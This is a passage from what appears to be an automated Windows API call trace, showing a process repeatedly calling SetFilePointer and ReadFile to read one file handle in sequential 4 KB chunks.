lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xcf000 [0081.210] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.211] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xd0000 [0081.211] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.211] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xd1000 [0081.211] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.212] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xd2000 [0081.212] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.213] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xd3000 [0081.213] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.213] SetFilePointer (in: 
hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xd4000 [0081.213] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.214] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xd5000 [0081.214] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.214] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xd6000 [0081.214] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.214] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xd7000 [0081.215] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.215] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xd8000 [0081.215] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 
[0081.216] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xd9000 [0081.216] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.216] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xda000 [0081.216] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.217] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xdb000 [0081.217] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.217] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xdc000 [0081.217] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.218] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xdd000 [0081.218] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, 
lpOverlapped=0x0) returned 1 [0081.218] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xde000 [0081.218] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.218] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xdf000 [0081.219] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.219] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xe0000 [0081.219] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.220] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xe1000 [0081.220] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.220] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xe2000 [0081.220] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, 
lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.221] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xe3000 [0081.221] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.221] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xe4000 [0081.221] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.222] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xe5000 [0081.222] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.222] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xe6000 [0081.222] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.222] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xe7000 [0081.222] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | 
out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.223] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xe8000 [0081.223] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.224] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xe9000 [0081.224] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.224] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xea000 [0081.224] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.225] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xeb000 [0081.225] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.225] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xec000 [0081.225] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, 
lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.225] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xed000 [0081.226] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.227] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xee000 [0081.227] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.227] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xef000 [0081.228] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.228] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xf0000 [0081.228] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.229] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xf1000 [0081.229] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, 
nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.229] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xf2000 [0081.230] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.230] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xf3000 [0081.230] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.231] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xf4000 [0081.231] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.231] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xf5000 [0081.231] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.232] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xf6000 [0081.232] ReadFile (in: 
hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.232] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xf7000 [0081.232] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.232] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xf8000 [0081.233] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.234] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xf9000 [0081.234] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.234] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xfa000 [0081.234] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.235] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xfb000 
[0081.235] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.235] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xfc000 [0081.235] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.236] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xfd000 [0081.236] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.236] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xfe000 [0081.236] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.237] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xff000 [0081.237] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.238] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x100000 [0081.238] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.256] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x101000 [0081.256] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.257] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x102000 [0081.257] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.257] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x103000 [0081.257] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.258] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x104000 [0081.258] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.258] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, 
